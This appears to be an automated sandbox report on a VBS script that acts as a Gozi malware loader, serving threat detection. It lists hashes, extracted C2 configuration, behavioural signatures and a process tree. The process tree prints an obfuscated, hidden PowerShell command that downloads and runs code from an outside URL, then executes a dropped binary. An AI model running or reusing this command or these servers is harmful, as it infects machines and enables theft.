Analysis
-
max time kernel
147s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
07-10-2023 01:22
Static task
static1
Behavioral task
behavioral1
Sample
8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6.vbs
Resource
win7-20230831-en
General
-
Target
8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6.vbs
-
Size
22KB
-
MD5
3dd859f7aa6f95b80aae2c7c4b5eaaf9
-
SHA1
3ef2f7246e9dee40ca9b6a7ecc0b5c7568367e80
-
SHA256
8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6
-
SHA512
9552049edd58c22dac6f081c110eaebbcc23f0c28e3544c8387da5a1be376fbf0b7c777a95bc1277c5246f8588be7632fd9f335d428bdc58864c870d04d9f994
-
SSDEEP
384:GOjk+QtGIKg7ETp2FHIKIGZVgXFpmcMYqYaGmPUVdE/MMMWm4qVuAL:I9eYjTT//0MjgVuAL
Malware Config
Extracted
http://communicalink.com/index.php
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1300 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Enwpv.exepid process 2792 Enwpv.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1300 powershell.exe 1300 powershell.exe 1300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1300 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.execmd.exepowershell.exedescription pid process target process PID 2200 wrote to memory of 2240 2200 WScript.exe cmd.exe PID 2200 wrote to memory of 2240 2200 WScript.exe cmd.exe PID 2200 wrote to memory of 2240 2200 WScript.exe cmd.exe PID 2240 wrote to memory of 1300 2240 cmd.exe powershell.exe PID 2240 wrote to memory of 1300 2240 cmd.exe powershell.exe PID 2240 wrote to memory of 1300 2240 cmd.exe powershell.exe PID 1300 wrote to memory of 2792 1300 powershell.exe Enwpv.exe PID 1300 wrote to memory of 2792 1300 powershell.exe Enwpv.exe PID 1300 wrote to memory of 2792 1300 powershell.exe Enwpv.exe PID 1300 wrote to memory of 2792 1300 powershell.exe Enwpv.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\Enwpv.exe"C:\Users\Admin\AppData\Local\Temp\Enwpv.exe"4⤵
- Executes dropped EXE
PID:2792
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
274KB
MD5d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA105263b9ec69fcf48cc71443ba23545fabe21df12
SHA256911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA5124629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512
-
Filesize
274KB
MD5d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA105263b9ec69fcf48cc71443ba23545fabe21df12
SHA256911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA5124629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512